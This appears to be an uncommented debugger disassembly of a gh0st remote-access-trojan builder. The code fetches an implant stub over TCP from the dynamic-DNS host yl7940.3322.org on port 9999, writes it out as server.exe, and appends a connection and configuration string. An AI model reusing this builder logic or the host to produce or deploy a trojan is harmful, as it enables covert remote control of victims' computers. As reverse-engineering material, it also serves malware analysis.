00402B07 . 8BCF mov ecx, edi
00402B09 . 50 push eax
00402B0A . 68 2A040000 push 42A
00402B0F . C645 FC 02 mov byte ptr [ebp-4], 2
00402B13 . E8 5CFB1300 call 00542674
00402B18 . 8BC8 mov ecx, eax
00402B1A . E8 E6D51300 call 00540105
00402B1F . 8B45 E4 mov eax, dword ptr [ebp-1C]
00402B22 . 3958 F8 cmp dword ptr [eax-8], ebx
00402B25 . 75 18 jnz short 00402B3F
00402B27 . 6A 40 push 40
00402B29 . 68 E8085B00 push 005B08E8 ; 提示
00402B2E . 68 CC0A5B00 push 005B0ACC ; 请填写安装路径...
00402B33 > 53 push ebx ; |hOwner
00402B34 . FF15 98155700 call dword ptr [<&USER32.MessageBoxA>>; \MessageBoxA
00402B3A . E9 84080000 jmp 004033C3
00402B3F > 399F 28010000 cmp dword ptr [edi+128], ebx
00402B45 . 0F84 98000000 je 00402BE3
00402B4B . A1 68395B00 mov eax, dword ptr [5B3968]
00402B50 . 8945 EC mov dword ptr [ebp-14], eax
00402B53 . 8D45 EC lea eax, dword ptr [ebp-14]
00402B56 . 8BCF mov ecx, edi
00402B58 . 50 push eax
00402B59 . 68 FD030000 push 3FD
00402B5E . C645 FC 03 mov byte ptr [ebp-4], 3
00402B62 . E8 E6D51300 call 0054014D
00402B67 . 51 push ecx
00402B68 . 8D45 EC lea eax, dword ptr [ebp-14]
00402B6B . 8BCC mov ecx, esp
00402B6D . 8965 BC mov dword ptr [ebp-44], esp
00402B70 . 50 push eax
00402B71 . E8 69041400 call 00542FDF
00402B76 . 51 push ecx
00402B77 . C645 FC 04 mov byte ptr [ebp-4], 4
00402B7B . 8BCC mov ecx, esp
00402B7D . 8965 C4 mov dword ptr [ebp-3C], esp
00402B80 . 68 64085B00 push 005B0864 ; httpurl
00402B85 . E8 4E071400 call 005432D8
00402B8A . 51 push ecx
00402B8B . C645 FC 05 mov byte ptr [ebp-4], 5
00402B8F . 8BCC mov ecx, esp
00402B91 . 8965 E0 mov dword ptr [ebp-20], esp
00402B94 . 68 28075B00 push 005B0728 ; build
00402B99 . E8 3A071400 call 005432D8
00402B9E . C645 FC 03 mov byte ptr [ebp-4], 3
00402BA2 . E8 05100000 call 00403BAC
00402BA7 . 8BC8 mov ecx, eax
00402BA9 . 81C1 C0000000 add ecx, 0C0
00402BAF . E8 186D0000 call 004098CC
00402BB4 . 8D4D EC lea ecx, dword ptr [ebp-14]
00402BB7 . E8 F40B1400 call 005437B0
00402BBC . 53 push ebx
00402BBD . 8D4D EC lea ecx, dword ptr [ebp-14]
00402BC0 . E8 D50A1400 call 0054369A
00402BC5 . 50 push eax
00402BC6 . E8 19F2FFFF call 00401DE4
00402BCB . 59 pop ecx
00402BCC . 50 push eax
00402BCD . 8D4D E8 lea ecx, dword ptr [ebp-18]
00402BD0 . E8 1E081400 call 005433F3
00402BD5 . 8D4D EC lea ecx, dword ptr [ebp-14]
00402BD8 . C645 FC 02 mov byte ptr [ebp-4], 2
00402BDC . E8 89061400 call 0054326A
00402BE1 . EB 45 jmp short 00402C28
00402BE3 > 8D45 E8 lea eax, dword ptr [ebp-18]
00402BE6 . 8BCF mov ecx, edi
00402BE8 . 50 push eax
00402BE9 . 68 FE030000 push 3FE
00402BEE . E8 5AD51300 call 0054014D
00402BF3 . 68 58075B00 push 005B0758 ; sgxy
00402BF8 . 8D4D E8 lea ecx, dword ptr [ebp-18]
00402BFB . E8 99991300 call 0053C599
00402C00 . 83F8 FF cmp eax, -1
00402C03 . 75 11 jnz short 00402C16
00402C05 . 6A 40 push 40
00402C07 . 68 E8085B00 push 005B08E8 ; 提示
00402C0C . 68 A80A5B00 push 005B0AA8 ; 您填写的域名上线字串格式出错了...
00402C11 .^ E9 1DFFFFFF jmp 00402B33
00402C16 > 68 B8685C00 push 005C68B8 ; /Arg2 = 005C68B8
00402C1B . 68 58075B00 push 005B0758 ; |sgxy
00402C20 . 8D4D E8 lea ecx, dword ptr [ebp-18] ; |
00402C23 . E8 3F961300 call 0053C267 ; \gh0st.0053C267
00402C28 > A1 68395B00 mov eax, dword ptr [5B3968]
00402C2D . 8945 DC mov dword ptr [ebp-24], eax
00402C30 . 399F 2C010000 cmp dword ptr [edi+12C], ebx
00402C36 . C645 FC 07 mov byte ptr [ebp-4], 7
00402C3A . C745 E0 9C0A5>mov dword ptr [ebp-20], 005B0A9C ; deltetme
00402C41 . 75 07 jnz short 00402C4A
00402C43 . C745 E0 900A5>mov dword ptr [ebp-20], 005B0A90 ; nodelete
00402C4A > 68 31040000 push 431
00402C4F . 8BCF mov ecx, edi
00402C51 . E8 1EFA1300 call 00542674
00402C56 . 53 push ebx ; /lParam
00402C57 . 53 push ebx ; |wParam
00402C58 . 56 push esi ; |Message
00402C59 . FF70 1C push dword ptr [eax+1C] ; |hWnd
00402C5C . FF15 7C175700 call dword ptr [<&USER32.SendMessageA>; \SendMessageA
00402C62 . 83F8 01 cmp eax, 1
00402C65 . 0F84 96000000 je 00402D01
00402C6B . 53 push ebx
00402C6C . 8D4D D4 lea ecx, dword ptr [ebp-2C]
00402C6F . E8 260A1400 call 0054369A
00402C74 . 50 push eax
00402C75 . E8 6AF1FFFF call 00401DE4
00402C7A . 59 pop ecx
00402C7B . 50 push eax
00402C7C . 53 push ebx
00402C7D . 8D8F 24010000 lea ecx, dword ptr [edi+124]
00402C83 . E8 120A1400 call 0054369A
00402C88 . 50 push eax
00402C89 . E8 56F1FFFF call 00401DE4
00402C8E . 59 pop ecx
00402C8F . 50 push eax
00402C90 . 53 push ebx
00402C91 . 8D4D E4 lea ecx, dword ptr [ebp-1C]
00402C94 . E8 010A1400 call 0054369A
00402C99 . 50 push eax
00402C9A . E8 45F1FFFF call 00401DE4
00402C9F . 59 pop ecx
00402CA0 . 50 push eax
00402CA1 . 53 push ebx
00402CA2 . 8D8F 1C010000 lea ecx, dword ptr [edi+11C]
00402CA8 . E8 ED091400 call 0054369A
00402CAD . 50 push eax
00402CAE . E8 31F1FFFF call 00401DE4
00402CB3 . 59 pop ecx
00402CB4 . 50 push eax
00402CB5 . 53 push ebx
00402CB6 . 8D8F 14010000 lea ecx, dword ptr [edi+114]
00402CBC . E8 D9091400 call 0054369A
00402CC1 . 50 push eax
00402CC2 . E8 1DF1FFFF call 00401DE4
00402CC7 . 59 pop ecx
00402CC8 . 8B4D B8 mov ecx, dword ptr [ebp-48]
00402CCB . 50 push eax
00402CCC . 53 push ebx
00402CCD . E8 C8091400 call 0054369A
00402CD2 . 50 push eax
00402CD3 . E8 0CF1FFFF call 00401DE4
00402CD8 . 59 pop ecx
00402CD9 . 50 push eax
00402CDA . FF75 E0 push dword ptr [ebp-20]
00402CDD . E8 02F1FFFF call 00401DE4
00402CE2 . 59 pop ecx
00402CE3 . 50 push eax
00402CE4 . 68 840A5B00 push 005B0A84 ; noactivex
00402CE9 . E8 F6F0FFFF call 00401DE4
00402CEE . 59 pop ecx
00402CEF . 50 push eax
00402CF0 . 8D45 DC lea eax, dword ptr [ebp-24]
00402CF3 . 68 6C0A5B00 push 005B0A6C ; %s!%s|%s@%s$%s^%s~%s`%s
00402CF8 . 50 push eax
00402CF9 . E8 219C1300 call 0053C91F
00402CFE . 83C4 28 add esp, 28
00402D01 > 68 F8010000 push 1F8
00402D06 . E8 7BC41300 call 0053F186
00402D0B . 59 pop ecx
00402D0C . 8945 BC mov dword ptr [ebp-44], eax
00402D0F . 3BC3 cmp eax, ebx
00402D11 . C645 FC 08 mov byte ptr [ebp-4], 8
00402D15 . 74 1C je short 00402D33
00402D17 . 53 push ebx
00402D18 . 68 580A5B00 push 005B0A58 ; 可执行文件|*.exe
00402D1D . 6A 02 push 2
00402D1F . 68 4C0A5B00 push 005B0A4C ; server.exe
00402D24 . 68 480A5B00 push 005B0A48 ; exe
00402D29 . 53 push ebx
00402D2A . 8BC8 mov ecx, eax
00402D2C . E8 0E9D1300 call 0053CA3F
00402D31 . EB 02 jmp short 00402D35
00402D33 > 33C0 xor eax, eax
00402D35 > 8B10 mov edx, dword ptr [eax]
00402D37 . 8BC8 mov ecx, eax
00402D39 . 8945 D0 mov dword ptr [ebp-30], eax
00402D3C . C645 FC 07 mov byte ptr [ebp-4], 7
00402D40 . 8945 B8 mov dword ptr [ebp-48], eax
00402D43 . FF92 B8000000 call dword ptr [edx+B8]
00402D49 . 83F8 01 cmp eax, 1
00402D4C . 0F85 65060000 jnz 004033B7
00402D52 . 8D85 74FEFFFF lea eax, dword ptr [ebp-18C]
00402D58 . 50 push eax ; /Buffer
00402D59 . 68 04010000 push 104 ; |BufSize = 104 (260.)
00402D5E . FF15 6C145700 call dword ptr [<&KERNEL32.GetTempPat>; \GetTempPathA
00402D64 . 8D85 74FEFFFF lea eax, dword ptr [ebp-18C]
00402D6A . 68 380A5B00 push 005B0A38 ; /\windstemp.exe
00402D6F . 50 push eax ; |ConcatString
00402D70 . FF15 70145700 call dword ptr [<&KERNEL32.lstrcatA>] ; \lstrcatA
00402D76 . 8D85 74FEFFFF lea eax, dword ptr [ebp-18C]
00402D7C . 50 push eax ; /FileName
00402D7D . FF15 74145700 call dword ptr [<&KERNEL32.DeleteFile>; \DeleteFileA
00402D83 . 8D85 DCF4FFFF lea eax, dword ptr [ebp-B24]
00402D89 . 895D E0 mov dword ptr [ebp-20], ebx
00402D8C . 50 push eax ; /pWSAData
00402D8D . 68 02020000 push 202 ; |RequestedVersion = 202 (2.2.)
00402D92 . FF15 B4195700 call dword ptr [<&WS2_32.#115>] ; \WSAStartup
00402D98 . 53 push ebx ; /Protocol
00402D99 . 6A 01 push 1 ; |Type = SOCK_STREAM
00402D9B . 6A 02 push 2 ; |Family = AF_INET
00402D9D . FF15 9C195700 call dword ptr [<&WS2_32.#23>] ; \socket
00402DA3 . 83CE FF or esi, FFFFFFFF
00402DA6 . 8945 EC mov dword ptr [ebp-14], eax
00402DA9 . 3BC6 cmp eax, esi
00402DAB . 75 3D jnz short 00402DEA
00402DAD . 53 push ebx ; /Arg3
00402DAE . 53 push ebx ; |Arg2
00402DAF . 68 280A5B00 push 005B0A28 ; |socket error!\n
00402DB4 > E8 708B1400 call 0054B929 ; \gh0st.0054B929
00402DB9 . FF15 80195700 call dword ptr [<&WS2_32.#116>] ; [WSACleanup
00402DBF . 8D4D DC lea ecx, dword ptr [ebp-24]
00402DC2 . C645 FC 02 mov byte ptr [ebp-4], 2
00402DC6 . E8 9F041400 call 0054326A
00402DCB . 8D4D D4 lea ecx, dword ptr [ebp-2C]
00402DCE . C645 FC 01 mov byte ptr [ebp-4], 1
00402DD2 . E8 93041400 call 0054326A
00402DD7 . 8D4D E4 lea ecx, dword ptr [ebp-1C]
00402DDA . 885D FC mov byte ptr [ebp-4], bl
00402DDD . E8 88041400 call 0054326A
00402DE2 . 8975 FC mov dword ptr [ebp-4], esi
00402DE5 . E9 F4050000 jmp 004033DE
00402DEA > 6A 07 push 7
00402DEC . 33C0 xor eax, eax
00402DEE . 59 pop ecx
00402DEF . 8DBD 79FFFFFF lea edi, dword ptr [ebp-87]
00402DF5 . 889D 78FFFFFF mov byte ptr [ebp-88], bl
00402DFB . 68 180A5B00 push 005B0A18 ; /yl7940.3322.org
00402E00 . F3:AB rep stos dword ptr es:[edi] ; |
00402E02 . 66:C745 98 02>mov word ptr [ebp-68], 2 ; |
00402E08 . AA stos byte ptr es:[edi] ; |
00402E09 . FF15 BC195700 call dword ptr [<&WS2_32.#52>] ; \gethostbyname
00402E0F . 3BC3 cmp eax, ebx
00402E11 . 74 2D je short 00402E40
00402E13 . 0FBF48 0A movsx ecx, word ptr [eax+A]
00402E17 . 8B40 0C mov eax, dword ptr [eax+C]
00402E1A . 51 push ecx
00402E1B . FF30 push dword ptr [eax]
00402E1D . 8D45 C4 lea eax, dword ptr [ebp-3C]
00402E20 . 50 push eax
00402E21 . E8 7A571200 call 005285A0
00402E26 . 83C4 0C add esp, 0C
00402E29 . FF75 C4 push dword ptr [ebp-3C]
00402E2C . FF15 40195700 call dword ptr [<&WS2_32.#12>] ; WS2_32.inet_ntoa
00402E32 . 50 push eax ; /String2
00402E33 . 8D85 78FFFFFF lea eax, dword ptr [ebp-88] ; |
00402E39 . 50 push eax ; |String1
00402E3A . FF15 78145700 call dword ptr [<&KERNEL32.lstrcpyA>] ; \lstrcpyA
00402E40 > 8D85 78FFFFFF lea eax, dword ptr [ebp-88]
00402E46 . 50 push eax ; /pAddr
00402E47 . FF15 90195700 call dword ptr [<&WS2_32.#11>] ; \inet_addr
00402E4D . 68 0F270000 push 270F ; /NetShort = 270F
00402E52 . 8945 9C mov dword ptr [ebp-64], eax ; |
00402E55 . FF15 A4195700 call dword ptr [<&WS2_32.#9>] ; \ntohs
00402E5B . 66:8945 9A mov word ptr [ebp-66], ax
00402E5F . 8D45 98 lea eax, dword ptr [ebp-68]
00402E62 . 6A 10 push 10 ; /AddrLen = 10 (16.)
00402E64 . 50 push eax ; |pSockAddr
00402E65 . FF75 EC push dword ptr [ebp-14] ; |Socket
00402E68 . FF15 A8195700 call dword ptr [<&WS2_32.#4>] ; \connect
00402E6E . 3BC6 cmp eax, esi
00402E70 . 75 0C jnz short 00402E7E
00402E72 . 53 push ebx
00402E73 . 53 push ebx
00402E74 . 68 040A5B00 push 005B0A04 ; 连接服务器失败!\n
00402E79 .^ E9 36FFFFFF jmp 00402DB4
00402E7E > 6A 3F push 3F
00402E80 . 33C0 xor eax, eax
00402E82 . 59 pop ecx
00402E83 . 8DBD 75FBFFFF lea edi, dword ptr [ebp-48B]
00402E89 . 889D 74FBFFFF mov byte ptr [ebp-48C], bl
00402E8F . 6A 3F push 3F
00402E91 . F3:AB rep stos dword ptr es:[edi]
00402E93 . 66:AB stos word ptr es:[edi]
00402E95 . AA stos byte ptr es:[edi]
00402E96 . 59 pop ecx
00402E97 . 33C0 xor eax, eax
00402E99 . 8DBD 75FCFFFF lea edi, dword ptr [ebp-38B]
00402E9F . 889D 74FCFFFF mov byte ptr [ebp-38C], bl
00402EA5 . F3:AB rep stos dword ptr es:[edi]
00402EA7 . 66:AB stos word ptr es:[edi]
00402EA9 . AA stos byte ptr es:[edi]
00402EAA . 8B45 CC mov eax, dword ptr [ebp-34]
00402EAD . FFB0 34010000 push dword ptr [eax+134] ; /<%s>
00402EB3 . 8DB0 34010000 lea esi, dword ptr [eax+134] ; |
00402EB9 . FFB0 30010000 push dword ptr [eax+130] ; |<%s>
00402EBF . 8D85 74FBFFFF lea eax, dword ptr [ebp-48C] ; |
00402EC5 . 68 F8095B00 push 005B09F8 ; |login:%s@%s
00402ECA . 50 push eax ; |s
00402ECB . FF15 9C155700 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
00402ED1 . 83C4 10 add esp, 10
00402ED4 . 8D85 74FBFFFF lea eax, dword ptr [ebp-48C]
00402EDA . 53 push ebx ; /Flags
00402EDB . 68 00010000 push 100 ; |DataSize = 100 (256.)
00402EE0 . 50 push eax ; |Data
00402EE1 . FF75 EC push dword ptr [ebp-14] ; |Socket
00402EE4 . FF15 94195700 call dword ptr [<&WS2_32.#19>] ; \send
00402EEA . 83F8 FF cmp eax, -1
00402EED . 53 push ebx ; /Arg3
00402EEE . 75 16 jnz short 00402F06 ; |
00402EF0 . 53 push ebx ; |Arg2
00402EF1 . 68 E8095B00 push 005B09E8 ; |发送数据失败!\n
00402EF6 > E8 2E8A1400 call 0054B929 ; \gh0st.0054B929
00402EFB > FF15 80195700 call dword ptr [<&WS2_32.#116>] ; [WSACleanup
00402F01 . E9 B1040000 jmp 004033B7
00402F06 > 8D85 74FCFFFF lea eax, dword ptr [ebp-38C] ; |
00402F0C . 68 00010000 push 100 ; |BufSize = 100 (256.)
00402F11 . 50 push eax ; |Buffer
00402F12 . FF75 EC push dword ptr [ebp-14] ; |Socket
00402F15 . FF15 98195700 call dword ptr [<&WS2_32.#16>] ; \recv
00402F1B . 3BC3 cmp eax, ebx
00402F1D . 0F84 C5040000 je 004033E8
00402F23 . 83CF FF or edi, FFFFFFFF
00402F26 . 3BC7 cmp eax, edi
00402F28 . 0F84 BA040000 je 004033E8
00402F2E . 8D85 74FCFFFF lea eax, dword ptr [ebp-38C]
00402F34 . 68 E0095B00 push 005B09E0 ; logined
00402F39 . 50 push eax
00402F3A . FF15 981D5900 call dword ptr [591D98] ; gh0st.005307D0
00402F40 . 59 pop ecx
00402F41 . 85C0 test eax, eax
00402F43 . 59 pop ecx
00402F44 . 74 1D je short 00402F63
00402F46 . 8D85 74FEFFFF lea eax, dword ptr [ebp-18C]
00402F4C . 50 push eax ; /FileName
00402F4D . FF15 7C145700 call dword ptr [<&KERNEL32.GetFileAtt>; \GetFileAttributesA
00402F53 . 3BC7 cmp eax, edi
00402F55 . 53 push ebx ; /Arg3
00402F56 . 74 3C je short 00402F94 ; |
00402F58 . 53 push ebx ; |Arg2
00402F59 . 68 C0095B00 push 005B09C0 ; |file is exist and can't delete!
00402F5E . E8 C6891400 call 0054B929 ; \gh0st.0054B929
00402F63 > FF15 80195700 call dword ptr [<&WS2_32.#116>] ; [WSACleanup
00402F69 . 8D4D DC lea ecx, dword ptr [ebp-24]
00402F6C . C645 FC 02 mov byte ptr [ebp-4], 2
00402F70 . E8 F5021400 call 0054326A
00402F75 . 8D4D D4 lea ecx, dword ptr [ebp-2C]
00402F78 . C645 FC 01 mov byte ptr [ebp-4], 1
00402F7C . E8 E9021400 call 0054326A
00402F81 . 8D4D E4 lea ecx, dword ptr [ebp-1C]
00402F84 . 885D FC mov byte ptr [ebp-4], bl
00402F87 . E8 DE021400 call 0054326A
00402F8C . 897D FC mov dword ptr [ebp-4], edi
00402F8F . E9 4A040000 jmp 004033DE
00402F94 > 68 80000000 push 80 ; |Attributes = NORMAL
00402F99 . 6A 02 push 2 ; |Mode = CREATE_ALWAYS
00402F9B . 53 push ebx ; |pSecurity
00402F9C . 6A 02 push 2 ; |ShareMode = FILE_SHARE_WRITE
00402F9E . 8D85 74FEFFFF lea eax, dword ptr [ebp-18C] ; |
00402FA4 . 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
00402FA9 . 50 push eax ; |FileName
00402FAA . FF15 80145700 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
00402FB0 . 6A 3F push 3F
00402FB2 . 8945 D8 mov dword ptr [ebp-28], eax
00402FB5 . 59 pop ecx
00402FB6 . 33C0 xor eax, eax
00402FB8 . 8DBD 75FDFFFF lea edi, dword ptr [ebp-28B]
00402FBE . F3:AB rep stos dword ptr es:[edi]
00402FC0 . 66:AB stos word ptr es:[edi]
00402FC2 . AA stos byte ptr es:[edi]
00402FC3 . 8B06 mov eax, dword ptr [esi]
00402FC5 . C685 74FDFFFF>mov byte ptr [ebp-28C], 9
00402FCC . 3958 F8 cmp dword ptr [eax-8], ebx
00402FCF . 74 16 je short 00402FE7
00402FD1 . 53 push ebx
00402FD2 . 8BCE mov ecx, esi
00402FD4 . E8 C1061400 call 0054369A
00402FD9 . 50 push eax ; /String2
00402FDA . 8D85 75FDFFFF lea eax, dword ptr [ebp-28B] ; |
00402FE0 . 50 push eax ; |String1
00402FE1 . FF15 78145700 call dword ptr [<&KERNEL32.lstrcpyA>] ; \lstrcpyA
00402FE7 > 53 push ebx ; /Flags
00402FE8 . 8D85 74FDFFFF lea eax, dword ptr [ebp-28C] ; |
00402FEE . 68 00010000 push 100 ; |DataSize = 100 (256.)
00402FF3 . 50 push eax ; |Data
00402FF4 . FF75 EC push dword ptr [ebp-14] ; |Socket
00402FF7 . FF15 94195700 call dword ptr [<&WS2_32.#19>] ; \send
00402FFD . 8B3D 84145700 mov edi, dword ptr [<&KERNEL32.Write>; kernel32.WriteFile
00403003 . BE B8095B00 mov esi, 005B09B8 ; 48f9648
00403008 > 68 08050000 push 508
0040300D . 8D85 6CF6FFFF lea eax, dword ptr [ebp-994]
00403013 . 53 push ebx
00403014 . 50 push eax
00403015 . E8 B6591200 call 005289D0
0040301A . 83C4 0C add esp, 0C
0040301D . 8D85 6CF6FFFF lea eax, dword ptr [ebp-994]
00403023 . 53 push ebx ; /Flags
00403024 . 68 08050000 push 508 ; |BufSize = 508 (1288.)
00403029 . 50 push eax ; |Buffer
0040302A . FF75 EC push dword ptr [ebp-14] ; |Socket
0040302D . FF15 98195700 call dword ptr [<&WS2_32.#16>] ; \recv
00403033 . 3BC3 cmp eax, ebx
00403035 . 74 68 je short 0040309F
00403037 . 83F8 FF cmp eax, -1
0040303A . 74 63 je short 0040309F
0040303C . 80BD 6CF6FFFF>cmp byte ptr [ebp-994], 11
00403043 . 74 09 je short 0040304E
00403045 . 80BD 6CF6FFFF>cmp byte ptr [ebp-994], 10
0040304C . 75 6B jnz short 004030B9
0040304E > 8D85 74FAFFFF lea eax, dword ptr [ebp-58C]
00403054 . 8D4D E8 lea ecx, dword ptr [ebp-18]
00403057 . 50 push eax
00403058 . E8 96031400 call 005433F3
0040305D . 8D45 C4 lea eax, dword ptr [ebp-3C]
00403060 . 53 push ebx
00403061 . 50 push eax
00403062 . 8D85 74F6FFFF lea eax, dword ptr [ebp-98C]
00403068 . FFB5 70F6FFFF push dword ptr [ebp-990]
0040306E . 50 push eax
0040306F . FF75 D8 push dword ptr [ebp-28]
00403072 . FFD7 call edi
00403074 . 8B85 70F6FFFF mov eax, dword ptr [ebp-990]
0040307A . 53 push ebx ; /Flags
0040307B . 0145 E0 add dword ptr [ebp-20], eax ; |
0040307E . 56 push esi ; |/String
0040307F . FF15 88145700 call dword ptr [<&KERNEL32.lstrlenA>] ; |\lstrlenA
00403085 . 40 inc eax ; |
00403086 . 50 push eax ; |DataSize
00403087 . 56 push esi ; |Data
00403088 . FF75 EC push dword ptr [ebp-14] ; |Socket
0040308B . FF15 94195700 call dword ptr [<&WS2_32.#19>] ; \send
00403091 . 80BD 6CF6FFFF>cmp byte ptr [ebp-994], 11
00403098 . 74 1F je short 004030B9
0040309A .^ E9 69FFFFFF jmp 00403008
0040309F > 53 push ebx ; /Arg3
004030A0 . 53 push ebx ; |Arg2
004030A1 . 68 A8095B00 push 005B09A8 ; |获取文件出错!
004030A6 . E8 7E881400 call 0054B929 ; \gh0st.0054B929
004030AB . FF75 D8 push dword ptr [ebp-28] ; /hObject
004030AE . FF15 9C145700 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
004030B4 .^ E9 42FEFFFF jmp 00402EFB
004030B9 > FF75 D8 push dword ptr [ebp-28] ; /hObject
004030BC . FF15 9C145700 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
004030C2 . FF75 EC push dword ptr [ebp-14] ; /Socket
004030C5 . FF15 B0195700 call dword ptr [<&WS2_32.#3>] ; \closesocket
004030CB . FF15 80195700 call dword ptr [<&WS2_32.#116>] ; [WSACleanup
004030D1 . 8B4D D0 mov ecx, dword ptr [ebp-30]
004030D4 . 8D45 E0 lea eax, dword ptr [ebp-20]
004030D7 . 50 push eax
004030D8 . 895D C0 mov dword ptr [ebp-40], ebx
004030DB . 895D C4 mov dword ptr [ebp-3C], ebx
004030DE . C645 FC 09 mov byte ptr [ebp-4], 9
004030E2 . E8 959B1300 call 0053CC7C
004030E7 . 8B00 mov eax, dword ptr [eax]
004030E9 . 53 push ebx ; /FailIfExists
004030EA . 50 push eax ; |NewFileName
004030EB . 8D85 74FEFFFF lea eax, dword ptr [ebp-18C] ; |
004030F1 . 50 push eax ; |ExistingFileName
004030F2 . FF15 8C145700 call dword ptr [<&KERNEL32.CopyFileA>>; \CopyFileA
004030F8 . F7D8 neg eax
004030FA . 1AC0 sbb al, al
004030FC . 8D4D E0 lea ecx, dword ptr [ebp-20]
004030FF . FEC0 inc al
00403101 . 8845 CB mov byte ptr [ebp-35], al
00403104 . E8 61011400 call 0054326A
00403109 . 385D CB cmp byte ptr [ebp-35], bl
0040310C . 74 15 je short 00403123
0040310E . 8D45 AC lea eax, dword ptr [ebp-54]
00403111 . 68 184A5900 push 00594A18 ; /Arg2 = 00594A18
00403116 . 50 push eax ; |Arg1
00403117 . C745 AC 9C095>mov dword ptr [ebp-54], 005B099C ; |生成时错误1
0040311E . E8 3D5A1200 call 00528B60 ; \gh0st.00528B60
00403123 > 8B4D D0 mov ecx, dword ptr [ebp-30]
00403126 . 8D45 E0 lea eax, dword ptr [ebp-20]
00403129 . 50 push eax
0040312A . E8 4D9B1300 call 0053CC7C
0040312F . 8B00 mov eax, dword ptr [eax]
00403131 . 53 push ebx ; /hTemplateFile
00403132 . 68 80000000 push 80 ; |Attributes = NORMAL
00403137 . 6A 03 push 3 ; |Mode = OPEN_EXISTING
00403139 . 53 push ebx ; |pSecurity
0040313A . 6A 02 push 2 ; |ShareMode = FILE_SHARE_WRITE
0040313C . 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
00403141 . 50 push eax ; |FileName
00403142 . FF15 80145700 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
00403148 . 8D4D E0 lea ecx, dword ptr [ebp-20]
0040314B . 8945 EC mov dword ptr [ebp-14], eax
0040314E . E8 17011400 call 0054326A
00403153 . 837D EC FF cmp dword ptr [ebp-14], -1
00403157 . 75 15 jnz short 0040316E
00403159 . 8D45 B0 lea eax, dword ptr [ebp-50]
0040315C . 68 184A5900 push 00594A18 ; /Arg2 = 00594A18
00403161 . 50 push eax ; |Arg1
00403162 . C745 B0 90095>mov dword ptr [ebp-50], 005B0990 ; |生成时错误2
00403169 . E8 F2591200 call 00528B60 ; \gh0st.00528B60
0040316E > 6A 02 push 2 ; /Origin = FILE_END
00403170 . 53 push ebx ; |pOffsetHi
00403171 . 53 push ebx ; |OffsetLo
00403172 . FF75 EC push dword ptr [ebp-14] ; |hFile
00403175 . FF15 90145700 call dword ptr [<&KERNEL32.SetFilePoi>; \SetFilePointer
0040317B . 8B4D CC mov ecx, dword ptr [ebp-34]
0040317E . 68 36040000 push 436
00403183 . E8 ECF41300 call 00542674
00403188 . 8B35 7C175700 mov esi, dword ptr [<&USER32.SendMes>; USER32.SendMessageA
0040318E . 53 push ebx ; /lParam
0040318F . 53 push ebx ; |wParam
00403190 . 68 F0000000 push 0F0 ; |Message = BM_GETCHECK
00403195 . FF70 1C push dword ptr [eax+1C] ; |hWnd
00403198 . FFD6 call esi ; \SendMessageA
0040319A . 83F8 01 cmp eax, 1
0040319D . 75 47 jnz short 004031E6
0040319F . 50 push eax
004031A0 . 895D D8 mov dword ptr [ebp-28], ebx
004031A3 . E8 DEBF1300 call 0053F186
004031A8 . 59 pop ecx
004031A9 . 8945 D0 mov dword ptr [ebp-30], eax
004031AC . FF15 94145700 call dword ptr [<&KERNEL32.GetTickCou>; [GetTickCount
004031B2 . 50 push eax ; /<%d>
004031B3 . 68 8C095B00 push 005B098C ; |%d
004031B8 . FF75 D0 push dword ptr [ebp-30] ; |s
004031BB . FF15 9C155700 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
004031C1 . 83C4 0C add esp, 0C
004031C4 > 837D D8 01 cmp dword ptr [ebp-28], 1
004031C8 . 7D 1C jge short 004031E6
004031CA . 8D45 C0 lea eax, dword ptr [ebp-40]
004031CD . 53 push ebx
004031CE . 50 push eax
004031CF . FF75 D0 push dword ptr [ebp-30] ; /String
004031D2 . FF15 88145700 call dword ptr [<&KERNEL32.lstrlenA>] ; \lstrlenA
004031D8 . 50 push eax
004031D9 . FF75 D0 push dword ptr [ebp-30]
004031DC . FF75 EC push dword ptr [ebp-14]
004031DF . FFD7 call edi
004031E1 . FF45 D8 inc dword ptr [ebp-28]
004031E4 .^ EB DE jmp short 004031C4
004031E6 > 8B4D CC mov ecx, dword ptr [ebp-34]
004031E9 . 68 51040000 push 451
004031EE . E8 81F41300 call 00542674
004031F3 . 53 push ebx
004031F4 . 53 push ebx
004031F5 . 68 F0000000 push 0F0
004031FA . FF70 1C push dword ptr [eax+1C]
004031FD . FFD6 call esi
004031FF . 83F8 01 cmp eax, 1
00403202 . 0F85 A9000000 jnz 004032B1
00403208 . A1 68395B00 mov eax, dword ptr [5B3968]
0040320D . 8945 D8 mov dword ptr [ebp-28], eax
00403210 . 8B4D CC mov ecx, dword ptr [ebp-34]
00403213 . 68 4E040000 push 44E
00403218 . C645 FC 0A mov byte ptr [ebp-4], 0A
0040321C . E8 53F41300 call 00542674
00403221 . 8D4D D8 lea ecx, dword ptr [ebp-28]
00403224 . 51 push ecx
00403225 . 8BC8 mov ecx, eax
00403227 . E8 D9CE1300 call 00540105
0040322C . 8B45 D8 mov eax, dword ptr [ebp-28]
0040322F . 3958 F8 cmp dword ptr [eax-8], ebx
00403232 . 75 24 jnz short 00403258
00403234 . 6A 40 push 40 ; /Style = MB_OK|MB_ICONASTERISK|MB_APPLMODAL
00403236 . 68 E8085B00 push 005B08E8 ; |提示
0040323B . 68 7C095B00 push 005B097C ; |请填写增大m数
00403240 . 53 push ebx ; |hOwner
00403241 . FF15 98155700 call dword ptr [<&USER32.MessageBoxA>>; \MessageBoxA
00403247 . 8D4D D8 lea ecx, dword ptr [ebp-28]
0040324A . C645 FC 09 mov byte ptr [ebp-4], 9
0040324E . E8 17001400 call 0054326A
00403253 . E9 5F010000 jmp 004033B7
00403258 > BE 00001000 mov esi, 100000
0040325D . 56 push esi
0040325E . E8 23BF1300 call 0053F186
00403263 . 59 pop ecx
00403264 . 8945 E0 mov dword ptr [ebp-20], eax
00403267 . 56 push esi
00403268 . 53 push ebx
00403269 . 50 push eax
0040326A . E8 61571200 call 005289D0
0040326F . FF75 D8 push dword ptr [ebp-28]
00403272 . 895D D0 mov dword ptr [ebp-30], ebx
00403275 . FF15 A41D5900 call dword ptr [591DA4] ; gh0st.00529FFF
0040327B . 83C4 10 add esp, 10
0040327E . 8945 BC mov dword ptr [ebp-44], eax
